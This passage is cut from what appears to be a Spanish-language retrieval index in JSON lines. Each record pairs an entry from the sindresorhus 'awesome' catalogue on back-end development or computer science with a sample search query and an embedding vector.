0.0348, -0.09308, 0.02692, -0.05768, 0.06415, 0.005, -0.01029, -0.05122, -0.03479, 0.01474, -0.02146, 0.00674, 0.04416, 0.03613, 0.04964, 0.00498, 0.00882, 0.01957, 0.02032, 0.01009, -0.021, -0.02194, 0.0224, 0.04837, 0.00321, -0.09089, 0.02057, -0.0217, 0.00384, 0.02943, -0.0361, 0.00599, -0.01619, -0.09596, -0.06241, -0.00551, -0.01485, -0.08231, -0.04548, 0.05364, 0.06495, -0.0344, -0.00971, 0.04114]} -{"tipo": "pregunta", "herramienta": "Back-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Back-End Development", "tema": "back-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Back-End Development: Flask β€” Python framework. Docker. Vagrant β€” Automation virtual machine environment. Pyramid β€” Python framework. Play1 Framework. CakePHP β€” PHP framework. Symfony β€” PHP framework. Education. Laravel β€” PHP framework. Education. Rails β€” Web app framework for Ruby. Gems β€” Packages. Phalcon β€” PHP framework. Useful `.htaccess` Snippets. nginx β€” Web server. Dropwizard β€” Java framework. Kubernetes β€” Open-source platform that automates Linux container operations. Lumen β€” PHP micro-framework. Serverless Framework β€” Serverless computing and serverless architectures. Apache Wicket β€” Java web app framework. Vert.x β€” Toolkit for building reactive apps on the JVM. Terraform β€” Tool for building, changing, and versioning infrastructure. Vapor β€” Server-side development in Swift. Dash β€” Python web app framework. FastAPI β€” Python web app framework. CDK β€” Open-source software development framework for defining cloud infrastructure in code. IAM β€” User accounts, authentication and authorization. Slim β€” PHP framework.", "indexar": "que herramienta me ayuda a desplegar aplicaciones en la nube con cΓ³digo", "v": [-0.03008, 0.03072, -0.10327, -0.24316, -0.03814, -0.10644, -0.11844, 0.07742, -0.11887, -0.0674, -0.13776, -0.16095, -0.04251, -0.05353, -0.0962, -0.05537, 0.01245, -0.11716, 0.01987, 0.0553, 0.02044, 0.08814, -0.229, -0.03381, -0.0774, 0.02255, 0.09327, 0.03377, -0.13534, -0.00886, -0.08425, -0.06141, 0.02776, -0.05821, -0.15192, 0.04179, 0.0509, -0.01174, -0.10996, 0.04964, -0.06858, 0.03387, -0.05926, 0.06177, -0.00539, 4e-05, -0.00803, 0.04308, -0.02472, 0.05697, -0.12682, -0.16316, -0.07195, 0.01014, -0.05979, -0.09944, 0.15596, -0.13248, -0.02687, -0.07251, -0.11629, 0.00818, -0.03766, -0.11097, 0.0482, 0.02682, 0.09291, 0.03764, -0.15574, 0.07381, 0.00663, 0.1306, -0.03908, -0.03429, 0.03491, 0.04344, 0.00107, -0.06767, 0.0007, 0.03343, 0.03434, 0.10198, -0.07456, 0.03197, -0.02863, -0.08766, 0.06387, 0.01281, 0.05554, -0.07832, 0.00584, 0.02011, 0.01605, 0.05376, 0.05679, 0.05621, 0.037, 0.03799, 0.05469, 0.09297, 0.11145, -0.07076, -0.00531, -0.06889, 0.0237, 0.02085, 0.06694, -0.04141, -0.05287, 0.03444, 0.02244, -0.05764, 0.0155, 0.04858, -0.05825, -0.02717, 0.03308, -0.10476, -0.05097, -0.09888, -0.03744, 0.01464, -0.05189, 0.0147, 0.03861, 0.05368, 0.00807, 0.10789, -0.03787, -0.07917, -0.09096, -0.04721, -0.05479, 0.06948, 0.04334, -0.00412, -0.01733, -0.11525, 0.02279, 0.02269, 0.03512, -0.0175, 0.01609, 0.04703, 0.03562, -0.00418, 0.04242, -0.0068, 0.01362, -0.03043, 0.0688, -0.02267, -0.07183, 0.00052, -0.11669, 0.04672, -0.04214, 0.03315, -0.09635, -0.02649, -0.03169, -0.01957, -0.0522, -0.05683, -0.01281, -0.07685, 0.07344, 0.04757, 0.04312, 0.10052, 0.00556, 0.01187, 0.0895, -0.04986, 0.02812, -0.04441, 0.04279, -0.01305, -0.05408, -0.087, -0.05861, -0.01807, 0.07275, -0.00515, 0.02056, -0.06757, -0.00193, 0.01832, -0.0063, 0.06572, -0.03661, 0.05356, 0.01671, -0.03812, 0.02321, -0.00853, -0.00616, -0.04431, -0.00896, -0.04461, -0.05338, 0.04908, -0.05648, -0.07421, -0.0012, 0.09306, -0.02538, 0.03862, 0.00304, 0.01786, 0.0224, 0.00349, 0.00939, 0.04599, 0.01146, -0.02381, 0.004, 0.07705, -0.01394, -0.04281, -0.01198, -0.04673, 0.0178, -0.02785, -0.02473, 0.02859, -0.00541, 0.06893, -0.02037, -0.01026, 0.02417, -0.07639, 0.02145, -0.04779, 0.02185, 0.00212, 0.01665, -0.002, -0.03566, -0.04094, -0.04798, 0.03706, 0.02935, -0.01648, -0.05453, -0.02049, -0.032, -0.0413, -0.03809, -0.00865, -0.01922, 0.03344, 0.08718, -0.05949, 0.02596, 0.00455]} -{"tipo": "pregunta", "herramienta": "Back-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Back-End Development", "tema": "back-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Back-End Development: Flask β€” Python framework. Docker. Vagrant β€” Automation virtual machine environment. Pyramid β€” Python framework. Play1 Framework. CakePHP β€” PHP framework. Symfony β€” PHP framework. Education. Laravel β€” PHP framework. Education. Rails β€” Web app framework for Ruby. Gems β€” Packages. Phalcon β€” PHP framework. Useful `.htaccess` Snippets. nginx β€” Web server. Dropwizard β€” Java framework. Kubernetes β€” Open-source platform that automates Linux container operations. Lumen β€” PHP micro-framework. Serverless Framework β€” Serverless computing and serverless architectures. Apache Wicket β€” Java web app framework. Vert.x β€” Toolkit for building reactive apps on the JVM. Terraform β€” Tool for building, changing, and versioning infrastructure. Vapor β€” Server-side development in Swift. Dash β€” Python web app framework. FastAPI β€” Python web app framework. CDK β€” Open-source software development framework for defining cloud infrastructure in code. IAM β€” User accounts, authentication and authorization. Slim β€” PHP framework.", "indexar": "con que puedo construir entornos virtuales de manera automΓ‘tica para desarrollo", "v": [0.12846, 0.10122, -0.18227, -0.0725, 0.0327, 0.05909, 0.03882, -0.00785, -0.02938, -0.1996, -0.04359, -0.13437, -0.02445, -0.04838, 0.02125, 0.10144, 0.06931, -0.16645, -0.06659, 0.08131, 0.05202, -0.12636, -0.04618, -0.00147, 0.06215, 0.01904, 0.01593, -0.08847, -0.07316, 0.0106, 0.12204, 0.21086, 0.08213, 0.01004, 0.0239, -0.17649, -0.03598, 0.06588, -0.02376, -0.06474, 0.06513, 0.12237, -0.05862, 0.00239, 0.04972, 0.01578, 0.04611, -0.09961, -0.0871, -0.07504, -0.0792, 0.0252, -0.11022, -0.09642, 0.07634, -0.05519, 0.19881, -0.15072, 0.06886, -0.03589, -0.11005, 0.07876, 0.02998, -0.00118, 0.05416, -0.02086, 0.01397, 0.04057, -0.1476, 0.01158, -0.07116, -0.03478, -0.04738, -0.02416, 0.07727, 0.04493, -0.15564, 0.05091, -0.05521, 0.04982, -0.03612, -0.04741, -0.00695, 0.02251, 0.03889, -0.05322, -0.08086, -0.04284, 0.07917, -0.04218, -0.00443, -0.01348, -0.02056, -0.03934, 0.00752, -0.04527, 0.05108, -0.01208, -0.03004, 0.0553, -0.06065, -0.03351, 0.006, 0.09104, 0.00244, 0.05154, 0.06554, -0.03239, 0.01847, -0.07596, 0.03448, 0.05029, -0.02806, -0.01595, 0.07252, -0.00873, 0.01186, 0.05071, 0.07295, -0.02707, 0.03913, 0.04026, -0.01658, -0.08031, -0.04869, -0.00867, -0.05511, 0.06787, 0.01055, -0.00563, -0.02638, -0.02989, -0.00046, -0.08653, -0.04403, 0.07696, 0.00432, -0.04023, 0.0062, -0.08922, 0.02781, 0.03959, 0.00622, -0.05757, -0.00383, -0.01822, -0.02171, -0.0977, -0.03202, 0.04524, 0.04003, 0.0531, 0.04582, 0.06113, -0.12512, 0.03123, -0.06822, -0.0254, 0.00507, 0.11257, 0.04543, 0.08587, 0.02479, 0.03291, -0.02145, -0.00131, -0.04027, -0.02654, 0.02962, 0.03888, -0.02635, -0.02216, 0.02691, -0.0609, -0.02371, 0.0071, -0.05266, -0.04161, 0.02948, -0.1023, -0.07491, 0.02684, -0.0587, 0.00657, -0.05695, -0.01046, 0.01231, -0.02783, 0.03915, 0.07145, -0.04041, -0.00276, -0.04379, 0.0064, 0.0607, -0.08932, -0.01248, -0.02173, -0.06452, -0.10033, -0.06112, -0.01497, -0.01115, -0.0362, -0.0094, 0.10461, -0.01872, 0.07098, -0.04472, 0.05408, 0.10759, -0.04516, 0.03923, -0.01525, -0.02225, 0.01128, 0.03485, -0.05232, -0.01099, -0.03873, 0.00362, -0.00268, 0.0523, -0.02299, 0.02962, 0.07524, 0.0293, 0.07156, 0.0307, -0.04251, -0.04694, 0.03672, -0.03078, -0.0725, 0.03415, 0.04877, 0.01458, -0.02116, -0.10369, 0.00065, 0.0139, 0.06565, -0.03355, -0.02132, -0.03747, -0.06172, -0.10354, 0.02733, 0.00448, -0.10698, -0.05159, 0.03169, 0.01679, -0.00741, -0.01426, 0.00271]} -{"tipo": "pregunta", "herramienta": "Back-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Back-End Development", "tema": "back-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Back-End Development: Flask β€” Python framework. Docker. Vagrant β€” Automation virtual machine environment. Pyramid β€” Python framework. Play1 Framework. CakePHP β€” PHP framework. Symfony β€” PHP framework. Education. Laravel β€” PHP framework. Education. Rails β€” Web app framework for Ruby. Gems β€” Packages. Phalcon β€” PHP framework. Useful `.htaccess` Snippets. nginx β€” Web server. Dropwizard β€” Java framework. Kubernetes β€” Open-source platform that automates Linux container operations. Lumen β€” PHP micro-framework. Serverless Framework β€” Serverless computing and serverless architectures. Apache Wicket β€” Java web app framework. Vert.x β€” Toolkit for building reactive apps on the JVM. Terraform β€” Tool for building, changing, and versioning infrastructure. Vapor β€” Server-side development in Swift. Dash β€” Python web app framework. FastAPI β€” Python web app framework. CDK β€” Open-source software development framework for defining cloud infrastructure in code. IAM β€” User accounts, authentication and authorization. Slim β€” PHP framework.", "indexar": "cual es una alternativa libre a los frameworks web de Python", "v": [-0.03129, -0.03364, -0.03127, -0.16428, -0.01663, -0.06613, -0.05416, -0.07571, -0.12189, -0.01167, 0.07762, -0.02329, -0.065, 0.03305, -0.00415, -0.00978, 0.00121, -0.15108, 0.13283, -0.0399, -0.15138, 0.01702, -0.20313, -0.12258, 0.06167, -0.0192, 0.0186, 0.05091, -0.08339, 0.01157, 0.06473, 0.08488, 0.05174, 0.07853, -0.12985, 0.00881, 0.14907, 0.15748, -0.0128, -0.06798, -0.0871, -0.1092, -0.08598, 0.13509, -0.13611, -0.02588, -0.06185, -0.02015, -0.02269, 0.05629, -0.08456, -0.10069, -0.1002, 0.02292, 0.08927, -0.05598, 0.16745, -0.10455, 0.03546, 0.00075, -0.17701, -0.0047, 0.03791, -0.07092, -0.02405, -0.00386, -0.06447, 0.01838, -0.10604, 0.10624, 0.06186, -0.01844, -0.00485, -0.00892, -0.00195, 0.07313, -0.10036, -0.02859, -0.07801, 0.09967, 0.00261, -0.12002, -0.02011, 0.09284, -0.0496, -0.09975, 0.02918, -0.08015, 0.03302, -0.00784, 0.05064, 0.12016, 0.00629, 0.04781, -0.04687, -0.04603, 0.03769, 0.0452, 0.05138, -0.0034, -0.01628, 0.01817, -0.08398, 0.0356, 0.01907, 0.03795, 0.01858, 0.08407, -0.08166, -0.03216, 0.04561, 0.01612, -0.02926, 0.00228, -0.00178, -0.08556, 0.00013, 0.09023, 0.0118, 0.00159, 4e-05, 0.01706, -0.11861, 0.02159, -0.0004, 0.089, 0.1109, 0.10009, -0.03711, -0.01606, 0.01417, -0.04133, -0.11616, -0.02235, -0.11453, 0.05641, 0.15345, -0.02041, 0.08033, 0.00209, -0.05721, -0.03275, -0.02142, 0.07181, 0.05092, -0.0919, -0.00289, -0.06599, -0.08098, -0.06325, -0.00594, 0.03081, -0.02397, 0.11098, -0.13038, 0.00062, -0.10593, -0.00761, -0.05558, -0.00145, 0.05369, -0.0356, 0.03576, -0.02254, 0.01878, 0.01447, -0.04605, 0.00014, -0.01735, 0.02812, 0.02558, 0.0777, 0.0595, -0.08544, 0.05307, -0.08759, -0.00862, -0.0698, -0.01451, -0.01515, -0.00019, -0.03724, -0.04127, -0.01545, -0.00298, -0.03841, -0.01536, 0.03681, -0.02091, 0.02728, -0.06541, 0.0614, -0.11065, -0.05866, -0.00434, 0.01549, -0.04325, -0.04816, 0.03316, -0.01935, -0.01926, -0.01313, -0.02206, -0.06815, -0.06978, 0.04886, -0.04576, -0.01823, 0.03492, 0.00768, 0.05921, -0.00066, 0.04825, -0.00663, 0.02892, -0.03882, 0.03492, 0.03885, 0.00477, -0.02736, -0.05532, 0.00349, 0.02254, 0.03431, -0.00463, -0.0036, -0.00033, 0.03799, -0.01576, 0.00445, -0.03112, -0.05276, -0.03918, 0.03065, 0.00988, 0.00029, -0.01444, 0.00968, -0.04612, 0.01204, -0.00971, 0.05973, -0.02772, -0.03623, 0.00243, -0.01301, -0.07179, -0.02036, -0.027, -0.03069, -0.05766, 0.01023, -0.00032, -0.01904, -0.00642, 0.03461]} -{"tipo": "pregunta", "herramienta": "Back-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Back-End Development", "tema": "back-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Back-End Development: Fiber β€” Web framework built on top of Fasthttp, the fastest HTTP engine for Go. Kustomize β€” Kubernetes native declarative configuration management tool. OpenTofu β€” Open-source infrastructure as code tool. Reflex β€” Python web framework for building both your frontend and backend with no JavaScript.", "indexar": "que framework en Go es el mΓ‘s rΓ‘pido para desarrollar servidores web?", "v": [-0.10676, -0.03383, -0.09707, -0.18026, -0.01092, -0.07764, 0.04278, -0.07798, 0.00047, -0.05261, -0.13781, 0.05312, -0.085, -0.12355, 0.09682, 0.0442, 0.14645, -0.05912, -0.03062, 0.11227, -0.04112, 0.04485, 0.01866, -0.03584, -0.05717, -0.03349, -0.00786, -0.05866, -0.10691, 0.01256, 0.05615, -0.08673, -0.08722, -0.02243, -0.11501, 0.01346, 0.04221, 0.13398, -0.11347, 0.04762, -0.01489, -0.0607, -0.1411, -0.00659, 0.01455, -0.04514, 0.06414, -0.14461, 0.09575, -0.01083, -0.12145, -0.01568, 0.01762, -0.05811, -0.09609, 0.01076, 0.08878, -0.18473, -0.00095, 0.00936, -0.1531, 0.00683, -0.07186, -0.09413, 0.01484, -0.05694, -0.04673, 0.0338, -0.11867, -0.04009, 0.02307, -0.02386, -0.01584, -0.02557, 0.02097, 0.10986, -0.076, -0.03941, 0.04454, 0.13773, 0.0469, 0.0414, -0.05672, 0.08287, -0.1541, -0.01674, -0.00472, 0.03576, 0.02386, 0.03695, 0.03452, 0.05425, -0.08305, -0.00517, -0.06353, -0.07979, 0.11856, -0.07758, 0.04874, -0.05411, -0.01928, 0.01212, -0.11842, 0.00668, -0.01111, 0.0636, 0.0969, 0.03542, -0.03665, -0.10692, -0.00867, 0.02189, -0.06251, 0.05335, 0.07069, -0.0283, 0.06187, -0.00082, -0.02902, 0.0379, -0.04661, 0.04611, -0.03248, 0.02616, 0.0283, 0.03931, 0.05352, 0.04491, -0.02524, -0.12838, 0.03691, -0.09224, -0.10791, 0.07011, -0.08931, 0.09728, 0.13396, 0.01211, 0.03902, -0.04636, -0.0116, -0.03868, -0.04747, 0.10255, 0.03966, -0.10212, 0.03635, -0.04739, -0.05444, -0.00649, -0.05685, -0.03816, -0.01975, -0.02698, -0.18393, -0.05876, -0.02005, -0.07233, -0.11007, -0.03909, 0.01614, 0.00863, 0.02244, 0.13209, -0.03022, 0.04364, -0.04472, 0.02621, 0.08211, 0.06669, 0.00616, -0.02693, 0.0205, -0.10254, 0.026, 0.02652, -0.0719, 0.01602, 0.01616, -0.01011, 0.00337, -0.02037, 0.01078, 0.05323, -0.09134, -0.06399, -0.02257, -0.03581, -0.03243, 0.03513, 0.00184, -0.00653, -0.01474, 0.01293, 0.04801, -0.03778, -0.07268, -0.0481, 0.00813, -0.02618, 0.0101, -0.07648, -0.02723, -0.03693, -0.0614, -0.02941, -0.02696, 0.02878, -0.00396, 0.04572, -0.00142, -0.02641, 0.07704, -0.0832, 0.02239, -0.03102, 0.07083, -0.01058, 0.00152, -0.05677, -0.00739, 0.00944, -0.01913, 0.00591, 0.02243, 0.02675, -0.02097, -0.0067, 0.02299, -0.00223, 0.02679, -0.00399, -0.0244, -0.06437, -0.05987, -0.02654, -0.05489, -0.05088, -0.06268, 8e-05, -0.0167, 0.0445, -0.06236, 0.02818, -0.01437, 0.02402, -0.02463, -0.0397, 0.00281, -0.07219, -0.03635, -0.03617, 0.0258, -0.00475, -0.04365, 0.01206]} -{"tipo": "pregunta", "herramienta": "Back-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Back-End Development", "tema": "back-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Back-End Development: Fiber β€” Web framework built on top of Fasthttp, the fastest HTTP engine for Go. Kustomize β€” Kubernetes native declarative configuration management tool. OpenTofu β€” Open-source infrastructure as code tool. Reflex β€” Python web framework for building both your frontend and backend with no JavaScript.", "indexar": "con que puedo gestionar la configuraciΓ³n declarativa de Kubernetes sin escribir YAML manualmente?", "v": [-0.08766, 0.08276, -0.06328, -0.14113, 0.07152, -0.15426, -0.11179, 0.12365, -0.16608, -0.12813, -0.13704, -0.09136, 0.06773, -0.01251, -0.04118, 0.07386, 0.03518, -0.08971, -0.04395, -0.00456, 0.10131, -0.07207, 0.0741, -0.01225, 0.02102, 0.03463, 0.02982, -0.10596, -0.11282, -0.03361, -0.02384, 0.09581, -0.05852, -0.05594, 0.07961, 0.1709, -0.09852, 0.07399, -0.06519, 0.18202, -0.01636, 0.02679, -0.00815, 0.20011, 0.05237, -0.00427, 0.05711, -0.02763, -0.08452, 0.00908, -0.03612, -0.04965, -0.0062, -0.04041, 0.02353, -0.00456, 0.14928, -0.1035, 0.02253, -0.07958, -0.01687, 0.07391, -0.04791, 0.04812, 0.069, 0.04671, 0.02381, -0.0579, -0.07242, 0.14188, 0.06712, 0.02515, -0.0368, 0.00167, 0.0962, -0.01173, 0.00208, 0.03954, 0.17315, 0.08483, -0.06482, -0.04718, -0.06384, 0.03977, 0.06336, -0.15811, -0.02416, -0.10807, -0.01076, -0.04172, 0.06243, -0.16613, -0.05994, -0.08473, 0.04157, -0.00228, 0.05804, 0.03711, -0.04486, 0.01858, 0.02958, 0.04298, -0.01358, 0.13585, 0.05413, 0.07882, 0.05718, 0.00222, 0.10467, -0.04366, 0.02959, -0.00604, -0.00974, -0.02999, 0.02466, 0.02382, 0.07184, -0.01719, -0.00858, 0.01423, -0.05814, -0.1138, 0.02264, -0.05521, 0.05452, -0.01419, -0.02326, 0.06253, -0.03004, 0.10412, -0.06011, 0.05505, 0.06549, 0.01343, -0.00493, 0.07021, -0.10646, 0.00344, -0.01851, -0.06443, -0.0436, 0.0812, 0.04585, -0.04551, 0.04725, -0.06527, -0.05047, -0.09625, 0.0123, 0.05976, 0.04267, 0.02249, 0.02905, 0.07945, -0.07504, 0.03864, -0.04487, 0.03517, -0.08545, 0.03475, -0.03279, 0.02361, -0.04174, 0.11451, -0.00856, -0.02364, -0.04874, -0.03374, 0.02892, 0.04098, -0.07223, -0.04279, 0.0253, 0.01284, 0.04308, -0.03296, 0.01424, -0.00824, 0.08305, 0.03535, 0.00431, -0.02499, -0.00851, -0.01677, -0.02494, 0.0307, 0.01018, 0.02524, 0.00128, 0.04061, -0.02018, 0.04805, 0.01572, -0.05729, 0.06235, -0.02714, -0.04867, -0.01225, -0.01976, -0.02808, 0.06507, 0.04994, 0.04133, 0.00518, 0.08579, 0.06518, -0.08297, 0.0803, -0.00896, -0.00496, 0.0552, -0.00991, 0.00553, -0.01141, -0.01914, 0.0218, -0.02565, -0.01661, 0.02582, -0.02602, 0.04224, -0.02236, 0.05586, -0.04945, -0.01711, -0.00476, 0.04374, 0.04219, 0.03974, 0.05144, -0.07244, 0.02805, -0.01574, 0.06486, 0.04553, 0.03123, 0.04796, -0.02544, 0.01388, 0.06029, 0.0584, 0.0388, 0.01798, -0.04407, -0.03794, -0.01819, -0.09442, 0.03046, -0.00505, -0.02739, 0.02168, 9e-05, 0.018, -0.01632, -0.0141, -0.01532]} -{"tipo": "pregunta", "herramienta": "Back-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Back-End Development", "tema": "back-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Back-End Development: Fiber β€” Web framework built on top of Fasthttp, the fastest HTTP engine for Go. Kustomize β€” Kubernetes native declarative configuration management tool. OpenTofu β€” Open-source infrastructure as code tool. Reflex β€” Python web framework for building both your frontend and backend with no JavaScript.", "indexar": "cual es una alternativa libre a Terraform para la infraestructura como cΓ³digo?", "v": [-0.10793, -0.08242, -0.02588, -0.08928, -0.03291, -0.11807, 0.05028, 0.03024, -0.11495, -0.04257, -0.07655, -0.14695, 0.05701, 0.02419, 0.16848, -0.04443, 0.10447, -0.15347, 0.12005, -0.05865, -0.08612, -0.03994, -0.0864, -0.03524, -0.04804, -0.16087, -0.06137, -0.02052, -0.11607, -0.10239, 0.07101, 0.0129, 0.14879, 0.02186, -0.06509, 0.03511, 0.1274, 0.152, -0.04198, -0.08282, -0.05361, -0.00159, 0.04944, 0.01932, 0.05158, -0.07623, -0.01961, 0.03225, 0.01948, -0.06363, -0.17774, 0.03502, -0.0437, -0.06841, 0.11692, 0.00923, 0.15715, -0.1379, -0.11983, 0.12057, -0.01812, -0.04164, 0.08203, -0.09779, -0.02483, 0.03006, -0.08631, 0.05664, -0.05272, 0.00441, 0.15204, 0.00319, -0.04527, -0.06614, -0.0371, 0.12557, -0.04168, -0.10816, -0.03045, 0.1594, 0.04411, 0.07143, -0.07315, 0.05407, -0.02227, -0.04149, 0.02067, -0.10194, 0.0163, 0.0184, 0.03497, 0.02591, 0.0476, 0.10541, 0.0195, -0.06738, -0.00657, 0.1579, -1e-05, 0.06004, 0.05603, 0.08921, -0.05785, -0.00682, 0.13013, 0.038, 0.04344, -0.03889, -0.07369, 0.0104, -0.03805, 0.0521, -0.04495, -0.08544, -0.05005, -0.0656, -0.03272, -0.00898, -0.02413, -0.05539, -0.0557, 0.0427, -0.07671, -0.03929, 0.02193, 0.08544, -0.00152, 0.01502, 0.02936, 0.01514, 0.00831, 0.00368, -0.00253, -0.01665, -0.06415, -0.01324, 0.08494, -0.06658, -0.01472, 0.03241, 0.00213, 0.0253, 0.01413, 0.04605, -0.0414, 0.06976, 0.03009, -0.07343, -0.0646, -0.08692, -0.06662, 0.09385, -0.06705, 0.05911, -0.05644, 0.02423, 0.04942, 0.03381, -0.11674, 0.12543, -0.05067, -0.04867, -0.05022, -0.01972, -0.00145, -0.00251, -0.00582, -0.00346, -0.05324, 0.01462, 0.06848, 0.02517, 0.09163, -0.02917, 0.01105, -0.04616, -0.05568, -0.03297, -0.03196, -0.01005, -0.03321, 0.034, -0.01335, 0.03077, -0.03133, -0.02247, -0.00695, -0.01317, 0.02395, -0.01938, 0.04741, 0.02418, 0.01563, 0.01372, -0.04883, -0.01226, 0.01793, -0.0639, -0.01933, -0.04053, -0.07647, -0.00174, -0.02378, -0.08342, 0.00884, -0.00023, -0.01451, -0.02326, -0.01127, 0.05111, 0.04594, -0.06014, 0.10813, -0.01344, 0.0085, -0.01357, 0.01768, 0.00854, -0.00425, 0.02779, -0.00799, -0.01634, -0.03995, 0.02051, -0.02951, 0.03161, 0.01548, 0.06158, -0.02081, -0.00741, -0.0022, -0.01396, 0.01355, 0.01183, 0.02668, 0.03012, 0.02643, -0.00701, -0.03552, -0.00543, 0.07093, 0.08529, -0.07949, -0.06449, -0.02854, 0.02021, -0.06981, -0.04118, -0.01463, -0.0552, 0.00359, 0.02847, 0.02006, 0.00247, 0.0087, 0.00277]} -{"tipo": "pregunta", "herramienta": "Computer Science", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Computer Science", "tema": "computer science", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Computer Science: University Courses. Data Science. Tutorials. Machine Learning. Tutorials. ML with Ruby β€” Learning, implementing, and applying Machine Learning using Ruby. Core ML Models β€” Models for Apple's machine learning framework. H2O β€” Open source distributed machine learning platform written in Java with APIs in R, Python, and Scala. Software Engineering for Machine Learning β€” From experiment to production-level machine learning. AI in Finance β€” Solving problems in finance with machine learning. JAX β€” Automatic differentiation and XLA compilation brought together for high-performance machine learning research. XAI β€” Providing insight, explanations, and interpretability to machine learning methods. Speech and Natural Language Processing. Spanish. NLP with Ruby. Question Answering β€” The science of asking and answering in natural language with a machine. Natural Language Generation β€” Generation of text used in data-to-text, conversational agents, and narrative generation applications. Linguistics. Cryptography.", "indexar": "que programa hay para aprender Machine Learning con Ruby?", "v": [-0.03133, 0.01568, -0.03898, -0.27839, -0.06329, -0.0591, -0.11607, 0.10397, 0.01403, -0.10606, -0.07754, -0.10879, 0.0765, 0.02914, -0.00513, 0.04634, -0.07851, 0.02148, -0.02581, -0.00777, 0.06789, 0.00221, -0.12487, 0.09739, 0.10851, -0.01693, 0.04328, -0.02728, 0.10268, 0.07259, 0.01403, 0.09543, -0.01317, -0.09633, -0.15656, 0.03443, 0.00407, -0.03435, -0.05102, 0.03607, 0.07723, 0.0072, -0.06301, 0.0356, 0.10168, 0.11498, 0.08922, -0.02416, -0.04929, 0.0231, 0.04289, 0.11076, 0.03924, -0.10206, 0.03272, -0.09048, -0.08752, -0.07988, -0.03123, -0.04315, -0.04302, -0.02308, -0.16122, -0.09447, 0.02838, 0.02054, 0.07696, 0.14301, -0.11674, 0.14933, 0.04475, -0.12217, -0.01744, -0.04644, -0.04275, 0.02975, 0.05804, 0.00977, 0.13295, -0.05809, -0.13138, -0.0043, -0.0322, -0.02726, 0.0849, 0.03519, -0.02253, -0.00328, 0.04932, -0.01253, -0.07762, 0.21642, -0.00365, -0.01229, 0.08153, -0.00874, 0.05357, -0.02006, 0.02715, -0.02144, -0.03778, -0.10191, -0.01937, 0.08149, -0.08029, 0.17835, 0.06689, -0.05265, -0.09855, -0.00859, -0.00761, 0.00887, -0.02286, -0.00725, -0.06029, -0.02658, 0.05679, 0.05863, -0.0197, -0.01714, -0.0602, 0.10049, -0.01559, 0.02517, 0.07265, 0.0449, -0.03137, 0.14675, -0.0212, -0.00732, 0.03305, 0.03009, -0.00429, 0.06995, -0.02734, 0.00612, 0.0346, -0.04267, -0.06243, -0.08248, -0.03656, 0.07804, 0.02489, 0.02769, -0.01397, 0.00474, 0.13011, -0.06645, 0.06716, -0.00554, -0.04797, -0.05897, 0.04026, 0.01547, -0.07227, -0.10702, 0.05732, -0.07163, -0.02929, 0.03436, -0.07831, 0.0495, 0.00219, -0.10539, 0.07578, -0.00049, -0.03407, 0.11976, 0.03986, 0.06122, -0.03356, 0.02991, 0.03028, 0.00123, -0.05834, -0.02352, -0.04215, -0.05298, 0.00355, -0.01716, -0.0539, 0.01254, -0.00502, -0.01218, 0.02014, 0.01891, -0.03076, 0.05454, -0.00205, -0.01227, -0.07208, -0.00795, -0.07866, -0.04679, 0.01806, -0.02338, -0.02933, 0.01053, 0.05262, -0.05312, -0.06768, 0.0724, 0.0006, 0.01636, 0.02205, 0.07974, 0.0043, -0.02178, -0.0192, 0.01389, 0.07435, 0.0083, 0.02535, -0.03331, 0.01848, -0.04294, -0.0598, 0.05997, -0.00146, 0.04074, 0.01723, -0.00099, 0.0014, 0.03904, -0.03886, -0.04588, 0.03102, 0.08261, 0.07107, 0.04064, -0.00311, -0.04983, 0.00159, -0.01443, 0.01797, -0.00141, 0.00266, 0.04682, -0.05394, -0.04282, 0.01181, 0.06203, 0.00328, -0.07193, -0.02931, -0.03474, 0.01772, -0.00011, 0.01134, -0.0177, -0.04443, -0.01529, 0.02427, -0.02571, -0.01124, 0.01857]} -{"tipo": "pregunta", "herramienta": "Computer Science", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Computer Science", "tema": "computer science", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Computer Science: University Courses. Data Science. Tutorials. Machine Learning. Tutorials. ML with Ruby β€” Learning, implementing, and applying Machine Learning using Ruby. Core ML Models β€” Models for Apple's machine learning framework. H2O β€” Open source distributed machine learning platform written in Java with APIs in R, Python, and Scala. Software Engineering for Machine Learning β€” From experiment to production-level machine learning. AI in Finance β€” Solving problems in finance with machine learning. JAX β€” Automatic differentiation and XLA compilation brought together for high-performance machine learning research. XAI β€” Providing insight, explanations, and interpretability to machine learning methods. Speech and Natural Language Processing. Spanish. NLP with Ruby. Question Answering β€” The science of asking and answering in natural language with a machine. Natural Language Generation β€” Generation of text used in data-to-text, conversational agents, and narrative generation applications. Linguistics. Cryptography.", "indexar": "con que puedo construir un agente de chat o generador de texto?", "v": [0.02887, 0.05907, -0.03699, -0.06744, 0.0002, 0.04357, -0.01787, 0.08288, -0.1164, -0.01823, -0.08672, -0.04042, -0.12355, 0.06365, 0.11562, 0.05272, 0.07886, -0.03981, 0.04092, 0.08709, 0.06172, -0.00672, 0.1587, -0.13063, 0.02428, 0.03476, 0.08518, -0.00902, -0.0111, 0.16931, 0.00744, 0.00259, 0.09125, -0.07375, 0.08413, -0.08788, -0.06996, 0.15898, 0.03807, 0.12028, 0.0093, 0.08372, -0.11928, 0.09221, 0.01295, 0.01868, 0.03719, 